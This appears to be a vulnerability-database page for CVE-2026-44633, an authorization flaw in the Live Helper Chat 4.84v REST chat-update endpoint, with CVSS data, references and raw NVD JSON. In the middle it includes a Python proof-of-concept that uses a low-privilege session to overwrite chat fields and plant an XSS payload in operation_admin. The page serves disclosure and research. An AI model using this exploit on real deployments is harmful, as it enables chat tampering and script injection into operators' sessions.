CVE-2026-44633

Description

Live Helper Chat is an open-source application that enables live support websites. In 4.84v, the Live Helper Chat REST API chat update endpoint allows a REST user with lhchat/use to update a chat in a department they cannot read. The endpoint accepts arbitrary chat object fields, so the user can change the chat hash and status and then access or tamper with the chat through visitor/widget paths. The same write primitive can set operation_admin, which is later emitted as operator-side JavaScript.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Live Helper Chat 4.84v

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target API endpoint
url = "http://target-site.com/api/rest/lhcchat/update_chat"

# Headers
cookies = {
    "LHC_SESSIONID": "low_privileged_session_id"
}

# Vulnerable Payload
# Exploiting the arbitrary field write to set operation_admin with XSS
payload = {
    "chat_id": "TARGET_CHAT_ID",
    "hash": "modified_hash_value",
    "status": "active",
    "operation_admin": "<img src=x onerror=alert('XSS')>"
}

try:
    response = requests.post(url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] PoC successful: Chat updated with malicious payload.")
        print("[+] When an operator views this chat, the XSS will trigger.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44633
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44633
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44633/
[4] VulDB https://vuldb.com/cve/CVE-2026-44633
[5] https://github.com/LiveHelperChat/livehelperchat/security/advisories/GHSA-hjqq-qmvj-9whm
[6] https://github.com/LiveHelperChat/livehelperchat/security/advisories/GHSA-hjqq-qmvj-9whm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44633", "sourceIdentifier": "[email protected]", "published": "2026-05-14T19:16:38.293", "lastModified": "2026-05-14T20:17:08.607", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Live Helper Chat is an open-source application that enables live support websites. In 4.84v, the Live Helper Chat REST API chat update endpoint allows a REST user with lhchat/use to update a chat in a department they cannot read. The endpoint accepts arbitrary chat object fields, so the user can change the chat hash and status and then access or tamper with the chat through visitor/widget paths. The same write primitive can set operation_admin, which is later emitted as operator-side JavaScript."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/LiveHelperChat/livehelperchat/security/advisories/GHSA-hjqq-qmvj-9whm", "source": "[email protected]"}, {"url": "https://github.com/LiveHelperChat/livehelperchat/security/advisories/GHSA-hjqq-qmvj-9whm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}